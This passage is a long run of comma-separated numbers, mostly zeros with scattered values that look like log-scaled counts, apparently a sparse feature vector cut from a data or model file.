0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, \n 4.06534854782536, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0,\n 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 3.931825632724326, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.9444389791664403, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, \n 0.0, 0.0, 0.0, 1.0986122886681098, 3.6375861597263857, 0.0, 0.0, 0.0, \n 0.0, 4.110873864173311, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 1.3862943611198906, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 4.605170185988092, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.3862943611198906, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 8.83331693749932, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 4.110873864173311, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 3.0841946160253872, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 3.7376696182833684, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 5.723585101952381,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0, 0.0, 2.772588722239781, 0.0, 0.0, 7.358193752733032, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.567740402508133,\n 0.0, 0.0, 5.030104765080701, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 3.1354942159291497, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 4.631631038266565, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 1.791759469228055, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 2.550898738446989, 0, 0.0, \n 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0,\n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 3.0910424533583156, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 4.160336650881089, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, \n 5.545177444479562, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.110873864173311, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 6.356107660695892, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 5.723585101952381, 0,\n 0, 0.0, 0.0, 0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 1.791759469228055, 0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 1.3862943611198906, 0, \n 5.723585101952381, 0.0, 0.0, 0, 0.0, 1.6094379124341003, \n 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.0910424533583156, 0.0, 3.7369991058576035, 2.5649493574615367, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0.0, 0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.931825632724326, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 1.3862943611198906, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0,\n 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 2.1972245773362196, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 1.3862943611198906, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0,\n 0, 0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 2.5649493574615367, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 